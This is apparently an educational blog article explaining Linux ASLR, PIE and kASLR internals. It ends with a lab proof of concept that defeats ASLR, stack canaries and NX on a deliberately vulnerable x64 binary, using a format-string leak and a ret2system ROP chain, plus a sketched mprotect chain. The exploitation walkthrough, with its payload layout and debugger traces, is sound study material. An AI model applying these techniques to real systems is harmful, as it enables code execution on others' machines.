Hey there! I’m finally ready to present the third installment of my series on exploit mitigation techniques.
Today I want to talk about Address Space Layout Randomization or ASLR in short.
Format-wise, the article is structured as follows:
- Introduction to the technique
- Current implementation details
- PoC on how to bypass ASLR
Disclaimer: The following is the result of self-study and might contain faulty information. If you find any, let me know. Thanks!
Prerequisites:
- A bunch of spare minutes
- A basic understanding of what causes memory corruptions/information leaks
- The will to ask or look up unknown terms yourself
- ASM/C knowledge
- x64 exploitation basics
- return oriented programming basics
- knowledge from my previous 2 installments
Address Space Layout Randomization
With DEP and canaries in place, adversaries can no longer easily execute arbitrary code inserted into memory.
Memory pages where buffer contents reside are marked non-executable, and the canary value prevents a simple overwrite of a function's return address.
A problem that was still present and exploited was that executed processes had a static address mapping.
That made it easy to find the addresses of library functions, or of the running binary itself, in memory, ultimately leading to a successful arc injection attack without much effort.
As a result, address space layout randomization (ASLR) emerged to bring another security parameter to the table and deny adversaries easily guessable memory locations.
The idea is to place objects randomly in the virtual address space, leaving an attacker with a non-trivial problem to solve: locating the placed malicious code so it can be executed at will.
A very tl;dr version of ASLR: a random offset is added to the base address during process creation to independently shift the three areas of a process’s address space, namely the executable, mapped and stack areas. In short, the most exploited areas — excuse me, rather: the stack, the heap and the libraries — are mapped at random locations in memory to prevent abuse.
Linux offers three different ASLR modes which are displayed below:
Linux ASLR can be configured through setting a value in /proc/sys/kernel/randomize_va_space. Three types of flags are available:
- 0 – No randomization. Everything is static.
- 1 – Conservative randomization. Shared libraries, stack, mmap(), VDSO and heap are randomized.
- 2 – Full randomization. In addition to the elements listed in the previous point, memory managed through brk() is also randomized.
Note: “VDSO” (virtual dynamic shared object) is a small shared library that the kernel automatically maps into the address space of all user-space applications.
Note 2: mmap() creates a new mapping in the virtual address space of the calling process.
Note 3: brk() and sbrk() change the location of the program break, which defines the end of the process’s data segment.
Beyond that, Linux systems offer position independent executable (PIE) binaries, which harden ASLR even further.
PIE is an additional address space randomization technique that compiles and links executables to be fully position independent.
The result is that binaries compiled this way have their code segment, their global offset table (GOT) and their procedure linkage table (PLT) placed at random locations within virtual memory on every execution as well, leaving no static locations at all.
Here you can see a simple overview of how a process can behave in memory after three successive executions:
Let’s talk about total position independency for a moment!
To make a PIE binary work correctly, there needs to be a way for the loader to resolve symbols at runtime.
Since the address of a symbol in memory is no longer part of the main binary, the loader adds a level of indirection via the procedure linkage table (PLT).
Instead of calling, let's say, puts() directly, the .plt section of the binary contains a special entry that points to the loader.
The loader then resolves the actual address of the function.
Once it has done that, it updates an entry in the global offset table (GOT).
Subsequent calls to the same routine jump through the GOT entry directly.
Trivia: The Linux command line program file detects PIE binaries as dynamic shared objects (DSO) instead of regular ELF executables.
PIE must be viewed as an addition to ASLR, since it would not do any good if there was no ASLR in the first place.
That said, since a PIE binary and all of its dependencies are loaded at random locations within virtual memory each time the application is executed, return oriented programming (ROP) attacks are much more difficult to execute reliably.
Okay back to the main topic about ASLR!
Linux based operating systems have had a default ASLR implementation since kernel version 2.6.12, released in 2005, which later received a set of patches from the PaX project to increase security. PaX had already published the first design and implementation of ASLR back in 2001. Only years later, with the release of kernel version 3.14 in 2014, came the possibility to enable kernel address space layout randomization (kASLR), which has the same goal as ASLR, but with the idea of randomizing the location of the kernel code in memory when the system boots.
Since kernel version 4.12 kASLR is enabled by default.
The effectiveness of kASLR has been questioned quite a few times already, and a variety of drawbacks are publicly known as of today.
Nonetheless it adds further hardening to the system and should not be dismissed that easily.
I have added some references at the end for anyone interested in kASLR exploitation :) .
Side note: Windows machines, on the other hand, have had ASLR and kASLR enabled by default since the launch of Windows Vista in 2006, and they work similarly. Due to differences in system design there are nuances that cannot be covered in this paper, but they can be looked up in a detailed analysis issued by the CERT Institute.
This makes clear that (k)ASLR and PIE rely solely on keeping the randomized memory layout secret to be effective.
ASLR implementation - Diving into the Linux kernel
What would a research article look like if we didn’t dig into the implementation ;) .
The kernel is huge and truly the work of geniuses, so I can, and will, only scratch the surface of the implementation in this article.
That also lets us focus on the relevant parts and keep the article a reasonable length.
Again remember, this will be all Linux specific, so please keep that in mind :) .
Note: We will mostly take a look at the current x86 implementation. Comparing the following to the other implementations is another topic!
Randomizing a memory address
So first of all how does the system get a randomized memory address in the available/valid address range?
Luckily the kernel code is open source and (mostly :D ) documented!
Let’s take a look at the /drivers/char/random.c kernel file, which handles exactly what we need:
Essentially, in order to generate a random address, randomize_page() takes two arguments: a start address and a range.
After some initial page-alignment magic, it ultimately comes down to calling the get_random_long() function and applying a modulo to obtain an address that lies within ‘range’ bytes of the supplied ‘start’ address.
ELF binary loading
If the kernel is instructed to load an ELF binary, a routine called load_elf_binary() is invoked.
It is located in /fs/binfmt_elf.c.
Here a multitude of things happen.
Let's take a quick look at the parts responsible for initializing the memory pointers for the code, data and stack sections.
We can see that if the randomize_va_space variable is higher than 1, and the PF_RANDOMIZE flag is set, the base address of brk() is randomized with the randomize_brk() function.
Furthermore, the top of the stack gets some randomization treatment as well!
Recall: brk() changes the location of the program break, which defines the end of the process’s data segment (i.e., the program break is the first location after the end of the uninitialized data segment). Increasing the program break allocates memory to the process; decreasing it deallocates memory.
The x86 implementation of the randomize_brk() function is located in /arch/x86/kernel/process.c: it randomizes the given address space by passing the current brk address together with a range argument of 0x02000000 to the aforementioned randomize_page() routine.
The stack randomization is started in /fs/binfmt_elf.c as well, in particular in the load_elf_binary() routine we already talked about!
In the end there are two components we have to look at here: first setup_arg_pages() and then randomize_stack_top().
Let's start with the latter, since its result is needed as a function argument for setup_arg_pages().
It takes the top of the stack as an address and returns a page aligned version of that address +/- some random offset.
This random offset is obtained by calling get_random_long() and doing, once again, some further randomization: a bitwise AND (&=) assignment with the defined STACK_RND_MASK, followed by a left shift (<<=) assignment by PAGE_SHIFT.
Okay, that was not all for the stack, as outlined just earlier!
The actual stack randomization takes place in /fs/exec.c, more specifically in the setup_arg_pages() routine.
If the stack segment does not grow upwards, the kernel passes the stack top address, which was an argument of the current function we are looking at, to arch_align_stack().
Then it aligns the returned value and continues further stack setup.
The alignment procedure can again be found in /arch/x86/kernel/process.c.
If the currently executed task has no ADDR_NO_RANDOMIZE flag set, and randomize_va_space has a value other than 0, the get_random_int() function is invoked to perform the stack randomization.
This happens by retrieving a random integer value and applying a modulo (%) operation with 8192.
After decrementing the stack pointer (sp) by this random number, in case of an ASLR-enabled task, the aforementioned alignment takes place: on x86-64 the stack pointer is aligned to 16 bytes by masking off its lowest four bits.
Recall: mmap() creates a new mapping in the virtual address space of the calling process. It takes two arguments: a start address for the new mapping and the length of the mapping.
After performing some essential tests to avoid collisions with the randomized virtual address space of the stack, the randomization routine for mmap() is started.
We can find the essential pieces in /arch/x86/mm/mmap.c:
First, the maximum randomized address is calculated via stack_maxrandom_size().
We can see that the routine itself gets called with an unsigned long rnd parameter, which is used as a factor to return a page aligned memory area.
The rnd variable is calculated and retrieved beforehand from the arch_rnd() routine, which looks like:
After checking whether randomization should take place at all, the routine computes the random offset from several components.
The number of random bits (rndbits) depends on whether we have a 32-bit or a 64-bit application.
Note: 1UL represents an unsigned long int with a value of 1, represented at the bit level as: 00000000000000000000000000000001
In the end, the value 1 (as an unsigned long) is left shifted by the rndbits value, and 1 is subtracted from the result, forming a bit mask.
Next, a bitwise AND of this mask with the output of get_random_long() takes place.
This lastly gets left shifted by PAGE_SHIFT.
So much for a brief overview of the Linux kernel internals for now.
Since the kernel is an ever evolving structure, things might be different in the near future, but the basic routines will most likely stay the same.
Let’s continue since we still have a lot more to talk about!
Next up will be the talk about known ASLR limitations.
Flashback: Data Execution Prevention
Recall: mprotect() changes the protection for the calling process’s memory page(s) containing any part of the address range in the interval [addr, addr+len-1].
Remember my first article about data execution prevention and non executable stacks :) ?
When skimming through the kernel code I found the snippet responsible for making the stack (non-)executable. It is right below the stack randomization part in /fs/exec.c:
For those of you who are still interested: it uses the mprotect_fixup() routine, which can be found in /mm/mprotect.c.
Known ASLR limitations
As good as ASLR sounds on paper, it has multiple design flaws, especially on 32-bit systems.
Moreover, multiple ways around ASLR have been found, which enable adversaries to still exploit applications with only a medium increase in workload during the exploit building phase.
One of the most critical constraints on 32-bit systems is the fragmentation problem, which limits the security design a lot.
Objects are randomly mapped in memory, leaving "chunks" of free memory between the mapped objects in the address space, which can also be seen in the ASLR graphics at the beginning.
Eventually no memory chunk big enough to hold a new mapping can be found anymore.
This is less of a problem on 64-bit systems due to the increased size of the virtual address space.
ASLR relies on the randomness applied to objects mapped in memory to be effective.
Nevertheless, a relative distance between objects in memory is maintained to give growable objects like the stack or heap more freedom, while avoiding fragmentation.
This method introduces a major flaw due to low entropy values.
On average, 16 bits of entropy are present on 32-bit systems, which can be brute forced within minutes at most on current systems.
64-bit systems have around 40 bits available for randomization, of which only around 28 bits can effectively be used for entropy, making them significantly more secure.
This only matters as long as one cannot guess some of the bits through information leaks or similar tactics.
Furthermore, it was observed that the random generator used by ASLR did not produce a truly uniform mapping for all libraries on either architecture, so focusing on the more likely addresses to hold mapped objects decreases the cost of a brute force attack even further.
Last but not least, the fact that libraries are mapped next to each other in memory can be used for correlation attacks, since knowing one library address leaks the positions of all surrounding ones as well.
That enabled an exploit tactic called offset2lib, where a buffer overflow is used to de-randomize an application's address space and fully abuse this.
Besides the aforementioned facts, known return-to-known-code attacks like ret2libc or return oriented programming work as well as ever if one can find the right addresses to use.
Additionally, for kASLR note that obtaining a single pointer that provides any kind of information about the kernel's allocation in memory can be enough to break the technique, since the kernel cannot change its layout in memory throughout its uptime.
This means that until the next system reboot, a re-randomization of the kernel code in memory will not, and more importantly cannot, be performed!
This makes kASLR weaker than its big brother ASLR, since the latter randomizes anew for every spawned process.
Note: binaries compiled without the PIE option are vulnerable even with full ASLR enabled. This is the case since an attacker can leverage the static .text, .plt and .got sections within the executable. Valid attack types in this case are ret2PLT/GOT or simply ROP!
Defeating ASLR, Stack Canaries and DEP as well as bypassing FULL RELRO on x64
Since ASLR does not bring anything new or fancy to the table and just randomizes the process address space of a given binary, I thought we could jump straight into x64 exploitation as well.
The vulnerable binary
So let’s get right into it:
The vulnerable program did not change much from last time.
It was already built with being exploited under ASLR in mind ;) Here is the code again:
There are two obvious vulnerabilities at hand.
One is a format string vulnerability in itIsJustASmallLeakSir(): we have full control of the buffer contents, and our given input is printed without any checks.
The other is a buffer overflow in trustMeIAmAnEngineer(): here 2048 bytes are read into a buffer that can hold only half of that.
Let’s compile it with gcc -o vuln_x64 vuln.c -Wl,-z,relro,-z,now.
Also let’s enable full ASLR:
echo 2 > /proc/sys/kernel/randomize_va_space
This results in a binary with the following exploit mitigations in place:
$ checksec vuln_x64
[*] '/home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64'
    Arch:  amd64-64-little
    RELRO: FULL RELRO
    Stack: Canary found
    NX:    NX enabled
    PIE:   No PIE (0x400000)
The assembly did not change much either, obviously. For the sake of completeness, let's take a look again:
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000000000400813 <+0>:   push   rbp
   0x0000000000400814 <+1>:   mov    rbp,rsp
   0x0000000000400817 <+4>:   sub    rsp,0x10
   0x000000000040081b <+8>:   mov    DWORD PTR [rbp-0x4],edi
   0x000000000040081e <+11>:  mov    QWORD PTR [rbp-0x10],rsi
   0x0000000000400822 <+15>:  mov    edi,0x400930                 ; string to be printed
   0x0000000000400827 <+20>:  mov    eax,0x0
   0x000000000040082c <+25>:  call   0x400620 <printf@plt>        ; Welcome message is printed
   0x0000000000400831 <+30>:  mov    rax,QWORD PTR [rip+0x200830] # 0x601068 <stdout@@GLIBC_2.2.5>
   0x0000000000400838 <+37>:  mov    esi,0x0
   0x000000000040083d <+42>:  mov    rdi,rax
   0x0000000000400840 <+45>:  call   0x400610 <setbuf@plt>
   0x0000000000400845 <+50>:  mov    edi,0x400954                 ; string to be printed
   0x000000000040084a <+55>:  mov    eax,0x0
   0x000000000040084f <+60>:  call   0x400620 <printf@plt>        ; "$> "
   0x0000000000400854 <+65>:  mov    eax,0x0
   0x0000000000400859 <+70>:  call   0x400766 <itIsJustASmallLeakSir> ; function call
   0x000000000040085e <+75>:  mov    edi,0xa                      ; string to be printed "\n"
   0x0000000000400863 <+80>:  call   0x4005e0 <putchar@plt>       ; "\n"
   0x0000000000400868 <+85>:  mov    edi,0x400954                 ; string to be printed
   0x000000000040086d <+90>:  mov    eax,0x0
   0x0000000000400872 <+95>:  call   0x400620 <printf@plt>        ; "$> "
   0x0000000000400877 <+100>: mov    eax,0x0
   0x000000000040087c <+105>: call   0x4007c4 <trustMeIAmAnEngineer> ; function call
   0x0000000000400881 <+110>: mov    edi,0x400958                 ; string to be printed
   0x0000000000400886 <+115>: call   0x4005f0 <puts@plt>          ; "\nI reached the end!\n"
   0x000000000040088b <+120>: mov    eax,0x0
   0x0000000000400890 <+125>: leave
   0x0000000000400891 <+126>: ret
End of assembler dump.
gdb-peda$ disassemble itIsJustASmallLeakSir
Dump of assembler code for function itIsJustASmallLeakSir:
   0x0000000000400766 <+0>:   push   rbp
   0x0000000000400767 <+1>:   mov    rbp,rsp
   0x000000000040076a <+4>:   sub    rsp,0x210
   0x0000000000400771 <+11>:  mov    rax,QWORD PTR fs:0x28        ; stack canary right here
   0x000000000040077a <+20>:  mov    QWORD PTR [rbp-0x8],rax
   0x000000000040077e <+24>:  xor    eax,eax
   0x0000000000400780 <+26>:  lea    rax,[rbp-0x210]              ; stack setup
   0x0000000000400787 <+33>:  mov    rsi,rax
   0x000000000040078a <+36>:  mov    edi,0x400928
   0x000000000040078f <+41>:  mov    eax,0x0
   0x0000000000400794 <+46>:  call   0x400650 <__isoc99_scanf@plt> ; user input is read
   0x0000000000400799 <+51>:  lea    rax,[rbp-0x210]
   0x00000000004007a0 <+58>:  mov    rdi,rax                      ; user input is copied to rdi for printing
   0x00000000004007a3 <+61>:  mov    eax,0x0
   0x00000000004007a8 <+66>:  call   0x400620 <printf@plt>        ; buf contents are printed
   0x00000000004007ad <+71>:  nop
   0x00000000004007ae <+72>:  mov    rax,QWORD PTR [rbp-0x8]      ; stack canary check routine starts
   0x00000000004007b2 <+76>:  xor    rax,QWORD PTR fs:0x28
   0x00000000004007bb <+85>:  je     0x4007c2 <itIsJustASmallLeakSir+92>
   0x00000000004007bd <+87>:  call   0x400600 <__stack_chk_fail@plt> ; stack canary check failure
   0x00000000004007c2 <+92>:  leave
   0x00000000004007c3 <+93>:  ret                                 ; return to main
End of assembler dump.
Lastly, we take a look at trustMeIAmAnEngineer():
gdb-peda$ disassemble trustMeIAmAnEngineer
Dump of assembler code for function trustMeIAmAnEngineer:
   0x00000000004007c4 <+0>:   push   rbp
   0x00000000004007c5 <+1>:   mov    rbp,rsp
   0x00000000004007c8 <+4>:   sub    rsp,0x410
   0x00000000004007cf <+11>:  mov    rax,QWORD PTR fs:0x28        ; stack canary right here
   0x00000000004007d8 <+20>:  mov    QWORD PTR [rbp-0x8],rax
   0x00000000004007dc <+24>:  xor    eax,eax
   0x00000000004007de <+26>:  lea    rax,[rbp-0x410]              ; stack setup
   0x00000000004007e5 <+33>:  mov    edx,0x800
   0x00000000004007ea <+38>:  mov    rsi,rax
   0x00000000004007ed <+41>:  mov    edi,0x0
   0x00000000004007f2 <+46>:  mov    eax,0x0
   0x00000000004007f7 <+51>:  call   0x400630 <read@plt>          ; user input is read
   0x00000000004007fc <+56>:  nop
   0x00000000004007fd <+57>:  mov    rax,QWORD PTR [rbp-0x8]      ; stack canary check routine starts
   0x0000000000400801 <+61>:  xor    rax,QWORD PTR fs:0x28
   0x000000000040080a <+70>:  je     0x400811 <trustMeIAmAnEngineer+77>
   0x000000000040080c <+72>:  call   0x400600 <__stack_chk_fail@plt> ; stack canary check failure
   0x0000000000400811 <+77>:  leave
   0x0000000000400812 <+78>:  ret                                 ; return to main
End of assembler dump.
gdb-peda$
As you can see, compared to last time not much changed, except that it is an x64 binary this time around.
All other parts should be known by now!
64-bit exploitation crash course
Let’s do a really short introduction to x64 exploitation.
My last two articles only covered x86 PoCs so let’s step up the game a bit further.
Not too much will change, but let’s get everyone roughly on the same level before continuing.
In x86 we have 8 general purpose registers: eax, ebx, ecx, edx, ebp, esp, esi and edi.
On x64 these got extended to 64 bits (the prefix changed from 'e' to 'r'), and 8 additional registers, r8 through r15, were added.
According to the Application Binary Interface (ABI), the first 6 integer or pointer arguments to a function are passed in registers.
The first argument is placed in rdi, the second in rsi, the third in rdx, and then come rcx, r8 and r9.
Only the 7th argument and onwards are passed on the stack!
r10 is used as a static chain pointer in the case of nested functions.
Extra: Return Oriented Programming (ROP) primer
The basic idea behind return oriented programming is that you chain together small ‘gadgets’.
A gadget is a short instruction sequence always ending with some kind of control flow manipulation to invoke the next gadget in the chain.
Most of the time this is a simple ret.
Once we execute a ret, the address of the next gadget is popped off the stack and control flow jumps to that address.
In particular, ROP is useful for circumventing Address Space Layout Randomization and DEP to gain e.g. arbitrary code execution of some form.
Note: If you want to get even more familiar with ROP check the challenge section of the forum. Multiple writeups of different complexity are waiting to be found.
We can find gadgets in numerous ways.
The easiest way might be to use one of the already existing tools like ropper.
For our binary above the shortened output looks like:
$ ropper2 --file ./vuln_x64
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%

Gadgets
=======
0x00000000004006c2: adc byte ptr [rax], ah; jmp rax;
0x000000000040090f: add bl, dh; ret;
0x0000000000400754: add byte ptr [rax - 0x7b], cl; sal byte ptr [rcx + rsi*8 + 0x55], 0x48; mov ebp, esp; call rax;
0x000000000040090d: add byte ptr [rax], al; add bl, dh; ret;
0x0000000000400752: add byte ptr [rax], al; add byte ptr [rax - 0x7b], cl; sal byte ptr [rcx + rsi*8 + 0x55], 0x48; mov ebp, esp; call rax;
0x000000000040090b: add byte ptr [rax], al; add byte ptr [rax], al; add bl, dh; ret;
[...]
0x0000000000400912: add byte ptr [rax], al; sub rsp, 8; add rsp, 8; ret;
0x000000000040088e: add byte ptr [rax], al; leave; ret;
0x000000000040088f: add cl, cl; ret;
0x0000000000400734: add eax, 0x200936; add ebx, esi; ret;
0x000000000040080b: add eax, 0xfffdefe8; dec ecx; ret;
[...]
0x00000000004005bd: add rsp, 8; ret;
0x0000000000400737: and byte ptr [rax], al; add ebx, esi; ret;
0x0000000000400886: call 0x5f0; mov eax, 0; leave; ret;
0x00000000004007bd: call 0x600; leave; ret;
[...]
0x00000000004006d0: pop rbp; ret;
0x0000000000400903: pop rdi; ret;
0x0000000000400901: pop rsi; pop r15; ret;
0x00000000004008fd: pop rsp; pop r13; pop r14; pop r15; ret;
0x000000000040075a: push rbp; mov rbp, rsp; call rax;
0x0000000000400757: sal byte ptr [rcx + rsi*8 + 0x55], 0x48; mov ebp, esp; call rax;
0x0000000000400915: sub esp, 8; add rsp, 8; ret;
0x0000000000400914: sub rsp, 8; add rsp, 8; ret;
0x00000000004006ca: test byte ptr [rax], al; add byte ptr [rax], al; add byte ptr [rax], al; pop rbp; ret;
0x0000000000400759: int1; push rbp; mov rbp, rsp; call rax;
0x00000000004007c2: leave; ret;
0x00000000004005c1: ret;

63 gadgets found
You can see that in our small binary over 60 unique gadgets are already present.
Now all that’s left is chaining the right ones together ;) .
In our case this won’t be as complicated, but depending on the binary you want to exploit this task can be a real hassle!
The exploit itself should be quite self explanatory, but let’s quickly walk through it together.
So first of all when launching the binary we wait for it to prompt us for the first input.
When this happens, we provide a bunch of %llx. format specifiers to get a leak from memory.
Recall: the %llx format specifier prints a long long-sized integer as hexadecimal.
The leak will look something like this:
It turned out that the 2nd leaked value is a random address within libc.
Since we have that one, we can calculate the base address of libc by looking up the libc mapping of the current process from within gdb:
gdb-peda$ vmmap
Start              End                Perm  Name
0x00400000         0x00401000         r-xp  /home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64
0x00600000         0x00601000         r--p  /home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64
0x00601000         0x00602000         rw-p  /home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64
0x01d12000         0x01d33000         rw-p  [heap]
0x00007f6c34c55000 0x00007f6c34e15000 r-xp  /lib/x86_64-linux-gnu/libc-2.23.so
0x00007f6c34e15000 0x00007f6c35015000 ---p  /lib/x86_64-linux-gnu/libc-2.23.so
0x00007f6c35015000 0x00007f6c35019000 r--p  /lib/x86_64-linux-gnu/libc-2.23.so
0x00007f6c35019000 0x00007f6c3501b000 rw-p  /lib/x86_64-linux-gnu/libc-2.23.so
0x00007f6c3501b000 0x00007f6c3501f000 rw-p  mapped
0x00007f6c3501f000 0x00007f6c35045000 r-xp  /lib/x86_64-linux-gnu/ld-2.23.so
0x00007f6c35218000 0x00007f6c3521b000 rw-p  mapped
0x00007f6c35244000 0x00007f6c35245000 r--p  /lib/x86_64-linux-gnu/ld-2.23.so
0x00007f6c35245000 0x00007f6c35246000 rw-p  /lib/x86_64-linux-gnu/ld-2.23.so
0x00007f6c35246000 0x00007f6c35247000 rw-p  mapped
0x00007ffdc2a72000 0x00007ffdc2a93000 rw-p  [stack]
0x00007ffdc2a98000 0x00007ffdc2a9b000 r--p  [vvar]
0x00007ffdc2a9b000 0x00007ffdc2a9d000 r-xp  [vdso]
0xffffffffff600000 0xffffffffff601000 r-xp  [vsyscall]
gdb-peda$
We can see that the randomized base address of the used libc is 0x00007f6c34c55000.
If we subtract this base from the random libc leak, we get an offset: the distance of the leaked address from the base of libc.
We can use exactly this offset value in any future execution to find our libc base address.
This works because, while the process memory and with it the position of libc are fully randomized, the offsets of things within a library never change; everything keeps the same distance from the base address. Hence calculating the randomized base address of libc with a static offset value works 100% of the time.
All of this base calculation happens in a small helper of the exploit script.
Having access to libc is like opening Pandora's box.
So many useful functions in there!
I chose to go the ret2system way and calculated the address of system() and a pointer to /bin/sh from the libc base address.
All of that happens in the exploit script as well.
A really valuable piece of information happened to be at the 71st position in the leaked data: our stack canary, which we need to successfully leverage the buffer overflow!
It is especially easy to spot, since it is a 64-bit value whose least significant byte is 0x00.
I just extracted the value from the leaked dump.
All that is left now is putting it all together.
This happens in
create_payload(canary, system, shell).
I’m filling the buffer until right before it would overflow into the stack canary.
Then I append the leaked canary value and continue to overwrite the saved RBP with some junk, since for the PoC it's irrelevant what we put there.
Afterwards our little friend, the pop rdi; ret gadget, is put onto the stack.
Lastly, a pointer to our wanted shell string and the address of system() itself are added.
Let’s visualize this in gdb.
Right when we hit the ret instruction in trustMeIAmAnEngineer, after our buffer overflow happened, our registers and stack look like this:
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7f6c34d4c260 (<__read_nocancel+7>: cmp rax,0xfffffffffffff001)
RDX: 0x800
RSI: 0x7ffdc2a90090 ("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab"...)
RDI: 0x0
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7ffdc2a904a8 --> 0x400903 (<__libc_csu_init+99>: pop rdi)
RIP: 0x400812 (<trustMeIAmAnEngineer+78>: ret)
R8 : 0x7f6c35219700 (0x00007f6c35219700)
R9 : 0x3
R10: 0x37b
R11: 0x246
R12: 0x400670 (<_start>: xor ebp,ebp)
R13: 0x7ffdc2a905a0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40080a <trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>
   0x40080c <trustMeIAmAnEngineer+72>: call 0x400600 <__stack_chk_fail@plt>
   0x400811 <trustMeIAmAnEngineer+77>: leave
=> 0x400812 <trustMeIAmAnEngineer+78>: ret
   0x400813 <main>: push rbp
   0x400814 <main+1>: mov rbp,rsp
   0x400817 <main+4>: sub rsp,0x10
   0x40081b <main+8>: mov DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7ffdc2a904a8 --> 0x400903 (<__libc_csu_init+99>: pop rdi)
0008| 0x7ffdc2a904b0 --> 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi)
0024| 0x7ffdc2a904c0 --> 0x40080a (<trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>)
0032| 0x7ffdc2a904c8 --> 0x7f6c34c75830 (<__libc_start_main+240>: mov edi,eax)
0040| 0x7ffdc2a904d0 --> 0x0
0048| 0x7ffdc2a904d8 --> 0x7ffdc2a905a8 --> 0x7ffdc2a92109 ("./binaries/vuln_x64")
0056| 0x7ffdc2a904e0 --> 0x135244ca0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gdb-peda$
We can see that all of our final payload is located on the stack.
When executing the ret instruction, the next value on the stack is popped into RIP.
This will be our pop rdi; ret gadget.
pop rdi; ret gadget.
The top of the stack, RSP, is adjusted accordingly to point to the next value on the stack, which is the pointer to our shell string /bin/sh.
[----------------------------------registers-----------------------------------]
[...]
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7ffdc2a904b0 --> 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh')
RIP: 0x400903 (<__libc_csu_init+99>: pop rdi)
[...]
[-------------------------------------code-------------------------------------]
=> 0x400903 <__libc_csu_init+99>: pop rdi
   0x400904 <__libc_csu_init+100>: ret
   0x400905: nop
   0x400906: nop WORD PTR cs:[rax+rax*1+0x0]
[------------------------------------stack-------------------------------------]
0000| 0x7ffdc2a904b0 --> 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh')
0008| 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi)
0016| 0x7ffdc2a904c0 --> 0x40080a (<trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>)
0024| 0x7ffdc2a904c8 --> 0x7f6c34c75830 (<__libc_start_main+240>: mov edi,eax)
0032| 0x7ffdc2a904d0 --> 0x0
0040| 0x7ffdc2a904d8 --> 0x7ffdc2a905a8 --> 0x7ffdc2a92109 ("./binaries/vuln_x64")
0048| 0x7ffdc2a904e0 --> 0x135244ca0
0056| 0x7ffdc2a904e8 --> 0x400813 (<main>: push rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gdb-peda$
We are at pop rdi; ret now, which will put the current top of the stack, our shell pointer, into RDI.
Since our chosen gadget ends with a ret statement, that ret is next in the execution flow.
It will continue execution with the next value RSP points to, which is our system() address.
[----------------------------------registers-----------------------------------]
[...]
RDI: 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh')
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi)
RIP: 0x400904 (<__libc_csu_init+100>: ret)
[...]
[-------------------------------------code-------------------------------------]
   0x4008fe <__libc_csu_init+94>: pop r13
   0x400900 <__libc_csu_init+96>: pop r14
   0x400902 <__libc_csu_init+98>: pop r15
=> 0x400904 <__libc_csu_init+100>: ret
   0x400905: nop
   0x400906: nop WORD PTR cs:[rax+rax*1+0x0]
   0x400910 <__libc_csu_fini>: repz ret
   0x400912: add BYTE PTR [rax],al
[------------------------------------stack-------------------------------------]
0000| 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi)
0008| 0x7ffdc2a904c0 --> 0x40080a (<trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>)
0016| 0x7ffdc2a904c8 --> 0x7f6c34c75830 (<__libc_start_main+240>: mov edi,eax)
0024| 0x7ffdc2a904d0 --> 0x0
0032| 0x7ffdc2a904d8 --> 0x7ffdc2a905a8 --> 0x7ffdc2a92109 ("./binaries/vuln_x64")
0040| 0x7ffdc2a904e0 --> 0x135244ca0
0048| 0x7ffdc2a904e8 --> 0x400813 (<main>: push rbp)
0056| 0x7ffdc2a904f0 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gdb-peda$
Remember what I introduced in the x64 exploitation crash course?
The first function argument on x64 needs to be put into RDI.
We managed to place our pointer to /bin/sh exactly there.
And that’s all actually!
system() is called with the contents of RDI as its function argument, which gets us a shell.
Alternative PoC: vmmap reveals that our stack ends at 0x00007ffdc2a93000, and the 62nd value in the leak (0x7ffdc2a905a0) lies within our stack frame.
We could leverage this to call mprotect() on the stack to make it executable again!
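The alternative route could be sketched as a small ROP chain that sets up the three mprotect() arguments. The leaked stack value is from the session above; the gadget and mprotect addresses below are purely hypothetical placeholders that would have to be located in the actual binary/libc (e.g. with ROPgadget or ropper).

```python
import struct

p64 = lambda a: struct.pack("<Q", a)

PAGE = 0x1000
leaked_stack = 0x7ffdc2a905a0              # 62nd leaked value, inside our frame
page_start   = leaked_stack & ~(PAGE - 1)  # mprotect requires page alignment

# hypothetical gadget/function addresses -- find the real ones yourself
POP_RDI_RET = 0x400903
POP_RSI_RET = 0x4008fb        # hypothetical
POP_RDX_RET = 0x7f6c34bf1b92  # hypothetical, from libc
MPROTECT    = 0x7f6c34d3c480  # hypothetical, libc mprotect()

PROT_RWX = 0x7  # PROT_READ | PROT_WRITE | PROT_EXEC

chain  = p64(POP_RDI_RET) + p64(page_start)  # 1st arg (RDI): aligned address
chain += p64(POP_RSI_RET) + p64(PAGE)        # 2nd arg (RSI): length
chain += p64(POP_RDX_RET) + p64(PROT_RWX)    # 3rd arg (RDX): protection flags
chain += p64(MPROTECT)                       # mprotect(page_start, PAGE, RWX)
```

After the call returns, shellcode placed inside that page would be executable again.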
